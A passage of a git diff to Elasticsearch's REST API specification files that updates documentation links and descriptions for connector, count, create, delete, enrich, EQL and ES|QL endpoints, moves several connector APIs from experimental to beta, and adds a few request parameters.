+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-get", + "description": "Get a connector sync job" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_list.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_list.json index 737028ce782f8..c4e958e197811 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_list.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_list.json @@ -1,10 +1,10 @@ { "connector.sync_job_list": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/list-connector-sync-jobs-api.html", - "description": "Lists all connector sync jobs." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-list", + "description": "Get all connector sync jobs" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_post.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_post.json index 88069718dbd20..51a750e5f0672 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_post.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_post.json @@ -1,10 +1,10 @@ { "connector.sync_job_post": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/create-connector-sync-job-api.html", - "description": "Creates a connector sync job." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-post", + "description": "Create a connector sync job" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_update_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_update_stats.json index 744de17a6ad00..dda4001d08faa 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_update_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.sync_job_update_stats.json @@ -1,8 +1,8 @@ { "connector.sync_job_update_stats": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/set-connector-sync-job-stats-api.html", - "description": "Updates the stats fields in the connector sync job document." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-update-stats", + "description": "Set the connector sync job stats" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_active_filtering.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_active_filtering.json index 343791e7ac11f..a249f9da7aede 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_active_filtering.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_active_filtering.json @@ -1,8 +1,8 @@ { "connector.update_active_filtering": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-filtering-api.html", - "description": "Activates the draft filtering rules if they are in a validated state." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-filtering", + "description": "Activate the connector draft filter" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_api_key_id.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_api_key_id.json index cc989bfec8a8d..547851ff14400 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_api_key_id.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_api_key_id.json @@ -1,10 +1,10 @@ { "connector.update_api_key_id": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-api-key-id-api.html", - "description": "Updates the API key id and/or API key secret id fields in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-api-key-id", + "description": "Update the connector API key ID" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_configuration.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_configuration.json index 1ececd7ea95f7..187de2ca58c1c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_configuration.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_configuration.json @@ -1,10 +1,10 @@ { "connector.update_configuration": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-configuration-api.html", - "description": "Updates the connector configuration." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-configuration", + "description": "Update the connector configuration" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_error.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_error.json index 150f71ad033ac..4f94a87a00695 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_error.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_error.json @@ -1,8 +1,8 @@ { "connector.update_error": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-error-api.html", - "description": "Updates the error field in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-error", + "description": "Update the connector error field" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_features.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_features.json index b488e19262c2e..17d89171a3612 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_features.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_features.json @@ -1,8 +1,8 @@ { "connector.update_features": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-features-api.html", - "description": "Updates the connector features in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-features", + "description": "Update the connector features" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering.json index c2a9bf0720746..42ca9d073057f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering.json @@ -1,10 +1,10 @@ { "connector.update_filtering": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-filtering-api.html", - "description": "Updates the filtering field in the connector document." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-filtering", + "description": "Update the connector filtering" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering_validation.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering_validation.json index 99b0a9e6116c1..133b05f735bd0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering_validation.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_filtering_validation.json @@ -1,8 +1,8 @@ { "connector.update_filtering_validation": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-filtering-api.html", - "description": "Updates the validation info of the draft filtering rules." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-filtering-validation", + "description": "Update the connector draft filtering validation" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_index_name.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_index_name.json index 97d76f60c0292..274bba95a399f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_index_name.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_index_name.json @@ -1,10 +1,10 @@ { "connector.update_index_name": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-index-name-api.html", - "description": "Updates the index name of the connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-index-name", + "description": "Update the connector index name" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_name.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_name.json index a7ca1a9730ab9..f9efc96b68bdd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_name.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_name.json @@ -1,10 +1,10 @@ { "connector.update_name": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-name-description-api.html", - "description": "Updates the name and/or description fields in the connector document." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-name", + "description": "Update the connector name and description" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_native.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_native.json index 5a13b44e8202d..f99ad5f1087d2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_native.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_native.json @@ -1,10 +1,10 @@ { "connector.update_native": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/connector-apis.html", - "description": "Updates the is_native flag of the connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-native", + "description": "Update the connector is_native flag" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_pipeline.json index b7ab6abcf088d..4a06d4db6953b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_pipeline.json @@ -1,10 +1,10 @@ { "connector.update_pipeline": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-pipeline-api.html", - "description": "Updates the pipeline field in the connector document." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-pipeline", + "description": "Update the connector pipeline" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_scheduling.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_scheduling.json index 98cee5c257b90..91edb0ffdad86 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_scheduling.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_scheduling.json @@ -1,10 +1,10 @@ { "connector.update_scheduling": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-scheduling-api.html", - "description": "Updates the scheduling field in the connector document." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-scheduling", + "description": "Update the connector scheduling" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_service_type.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_service_type.json index 279d93c684783..b12552d862818 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_service_type.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_service_type.json @@ -1,10 +1,10 @@ { "connector.update_service_type": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-service-type-api.html", - "description": "Updates the service type of the connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-service-type", + "description": "Update the connector service type" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_status.json index ea5e506faad89..d55b223bf438e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/connector.update_status.json @@ -1,8 +1,8 @@ { "connector.update_status": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-connector-status-api.html", - "description": "Updates the status of the connector." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-update-status", + "description": "Update the connector status" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/count.json b/rest-api-spec/src/main/resources/rest-api-spec/api/count.json index 6ebeb572f0481..fad7e2174591d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/count.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/count.json @@ -1,8 +1,8 @@ { "count":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-count.html", - "description":"Returns number of documents matching a query." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-count", + "description":"Count search results" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/create.json b/rest-api-spec/src/main/resources/rest-api-spec/api/create.json index 65cb0da4753cc..215c756073912 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/create.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/create.json @@ -1,8 +1,8 @@ { "create":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-index_.html", - "description":"Creates a new document in the index.\n\nReturns a 409 response when a document with a same ID already exists in the index." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-create", + "description":"Create a new document in the index" }, "stability":"stable", "visibility":"public", @@ -73,6 +73,14 @@ "include_source_on_error": { "type": "boolean", "description": "True or false if to include the document source in the error message in case of parsing errors. Defaults to true." + }, + "require_alias":{ + "type":"boolean", + "description":"When true, requires destination to be an alias. Default is false" + }, + "require_data_stream":{ + "type":"boolean", + "description":"When true, requires destination to be a data stream (existing or to be created). Default is false" } }, "body":{ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.delete_dangling_index.json b/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.delete_dangling_index.json index 8106e80deeaf8..2201aa78cd2b7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.delete_dangling_index.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.delete_dangling_index.json @@ -1,8 +1,8 @@ { "dangling_indices.delete_dangling_index": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-gateway-dangling-indices.html", - "description": "Deletes the specified dangling index" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-dangling-indices-delete-dangling-index", + "description": "Delete a dangling index" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.import_dangling_index.json b/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.import_dangling_index.json index f81afc3558cbd..5db8840873227 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.import_dangling_index.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.import_dangling_index.json @@ -1,8 +1,8 @@ { "dangling_indices.import_dangling_index": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-gateway-dangling-indices.html", - "description": "Imports the specified dangling index" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-dangling-indices-import-dangling-index", + "description": "Import a dangling index" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.list_dangling_indices.json b/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.list_dangling_indices.json index 4310faa96185f..ce868bdd21ee2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.list_dangling_indices.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/dangling_indices.list_dangling_indices.json @@ -1,8 +1,8 @@ { "dangling_indices.list_dangling_indices": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-gateway-dangling-indices.html", - "description": "Returns all dangling indices." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-dangling-indices-list-dangling-indices", + "description": "Get the dangling indices" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/delete.json index 7fbc693d069bf..15139e81c67d8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/delete.json @@ -1,8 +1,8 @@ { "delete":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-delete.html", - "description":"Removes a document from the index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-delete", + "description":"Delete a document" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query.json b/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query.json index cc36acea13492..c8edc0496cd55 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query.json @@ -1,8 +1,8 @@ { "delete_by_query":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-delete-by-query.html", - "description":"Deletes documents matching the provided query." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-delete-by-query", + "description":"Delete documents" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query_rethrottle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query_rethrottle.json index e8ff1a61f83f8..1c6a89eebf075 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query_rethrottle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/delete_by_query_rethrottle.json @@ -1,8 +1,8 @@ { "delete_by_query_rethrottle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-delete-by-query.html", - "description":"Changes the number of requests per second for a particular Delete By Query operation." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-delete-by-query-rethrottle", + "description":"Throttle a delete by query operation" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/delete_script.json b/rest-api-spec/src/main/resources/rest-api-spec/api/delete_script.json index cf6573372ddb2..0071fe8740f9e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/delete_script.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/delete_script.json @@ -1,8 +1,8 @@ { "delete_script":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html", - "description":"Deletes a script." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-delete-script", + "description":"Delete a script or search template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.delete_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.delete_policy.json index 5c6b05a548987..99f0a2def7fab 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.delete_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.delete_policy.json @@ -1,8 +1,8 @@ { "enrich.delete_policy": { "documentation": { - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-enrich-policy-api.html", - "description": "Deletes an existing enrich policy and its enrich index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-delete-policy", + "description": "Delete an enrich policy" }, "stability" : "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.execute_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.execute_policy.json index 2add255148508..ae84a726df82c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.execute_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.execute_policy.json @@ -1,8 +1,8 @@ { "enrich.execute_policy": { "documentation": { - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/execute-enrich-policy-api.html", - "description": "Creates the enrich index for an existing enrich policy." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-execute-policy", + "description": "Run an enrich policy" }, "stability" : "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.get_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.get_policy.json index e735a75f67ee9..5f0f4fc9ca5b5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.get_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.get_policy.json @@ -1,8 +1,8 @@ { "enrich.get_policy": { "documentation": { - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-enrich-policy-api.html", - "description": "Gets information about an enrich policy." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-get-policy", + "description": "Get an enrich policy" }, "stability" : "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.put_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.put_policy.json index 287c7d96dca9d..cf2c11cc21b12 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.put_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.put_policy.json @@ -1,8 +1,8 @@ { "enrich.put_policy": { "documentation": { - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-enrich-policy-api.html", - "description": "Creates a new enrich policy." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-put-policy", + "description": "Create an enrich policy" }, "stability" : "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.stats.json index 835fa3f6ffef2..1bdeccc1c9715 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/enrich.stats.json @@ -1,8 +1,8 @@ { "enrich.stats": { "documentation": { - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/enrich-stats-api.html", - "description": "Gets enrich coordinator statistics and information about enrich policies that are currently executing." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-stats", + "description": "Get enrich stats" }, "stability" : "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.delete.json index 18f690227ca3c..4c8c2a2cd54ed 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.delete.json @@ -1,8 +1,8 @@ { "eql.delete":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-search-api.html", - "description": "Deletes an async EQL search by ID. If the search is still running, the search request will be cancelled. Otherwise, the saved search results are deleted." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-delete", + "description": "Delete an async EQL search" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get.json index c7a228da97a53..34b770997eee5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get.json @@ -1,8 +1,8 @@ { "eql.get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-search-api.html", - "description": "Returns async results from previously executed Event Query Language (EQL) search" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-get", + "description": "Get async EQL search results" }, "stability": "stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get_status.json index be8a439893362..00e478659b389 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.get_status.json @@ -1,8 +1,8 @@ { "eql.get_status": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-search-api.html", - "description": "Returns the status of a previously submitted async or stored Event Query Language (EQL) search" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-get-status", + "description": "Get the async EQL status" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.search.json index 
diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.search.json
index 0b1a7ad5a38d3..afb3b8508599e 100644
--- a/rest-api-spec/src/main/resources/rest-api-spec/api/eql.search.json
+++ b/rest-api-spec/src/main/resources/rest-api-spec/api/eql.search.json
@@ -1,8 +1,8 @@
 {
 "eql.search":{
 "documentation":{
- "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-search-api.html",
- "description": "Returns results matching a query expressed in Event Query Language (EQL)"
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-search",
+ "description": "Get EQL search results"
 },
 "stability": "stable",
 "visibility":"public",
@@ -51,6 +51,31 @@
 "type":"boolean",
 "description":"Control whether a sequence query should return partial results or no results at all in case of shard failures. This option has effect only if [allow_partial_search_results] is true.",
 "default":false
+ },
+ "ccs_minimize_roundtrips":{
+ "type":"boolean",
+ "description":"Indicates whether network round-trips should be minimized as part of cross-cluster search requests execution",
+ "default":true
+ },
+ "ignore_unavailable":{
+ "type":"boolean",
+ "description":"Whether specified concrete indices should be ignored when unavailable (missing or closed)"
+ },
+ "allow_no_indices":{
+ "type":"boolean",
+ "description":"Whether to ignore if a wildcard indices expression resolves into no concrete indices. (This includes `_all` string or when no indices have been specified)"
+ },
+ "expand_wildcards":{
+ "type":"enum",
+ "options":[
+ "open",
+ "closed",
+ "hidden",
+ "none",
+ "all"
+ ],
+ "default":"open",
+ "description":"Whether to expand wildcard expression to concrete indices that are open, closed or both."
 }
 },
 "body":{
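
Note: the @@ -51,6 +51,31 @@ hunk above adds the cross-cluster and index-resolution parameters to eql.search. A minimal sketch of how they combine on a request, assuming a local cluster; the index pattern and EQL query are illustrative, while the parameter names and defaults come straight from the new spec entries:

    # expand_wildcards defaults to open and ccs_minimize_roundtrips to true;
    # allow_no_indices tolerates patterns that match nothing.
    curl -s -X POST "http://localhost:9200/logs-*/_eql/search?expand_wildcards=open&allow_no_indices=true&ccs_minimize_roundtrips=true" \
      -H 'Content-Type: application/json' \
      -d '{"query": "process where process.name == \"regsvr32.exe\""}'
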
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-delete", + "description": "Delete an async ES|QL query" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_get.json index c4670758f7fe9..07454a0877592 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_get.json @@ -1,8 +1,8 @@ { "esql.async_query_get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-async-query-get-api.html", - "description": "Retrieves the results of a previously submitted async query request given its ID." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-get", + "description": "Get async ES|QL query results" }, "stability":"stable", "visibility":"public", @@ -26,6 +26,10 @@ ] }, "params":{ + "format":{ + "type":"string", + "description":"a short version of the Accept header, e.g. json, yaml" + }, "wait_for_completion_timeout":{ "type":"time", "description":"Specify the time that the request should block waiting for the final response" diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_stop.json b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_stop.json index 6fbdefef8b689..181ebdaadae2c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_stop.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/esql.async_query_stop.json @@ -1,8 +1,8 @@ { "esql.async_query_stop": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-async-query-stop-api.html", - "description": "Stops a previously submitted async query request given its ID and collects the results." 
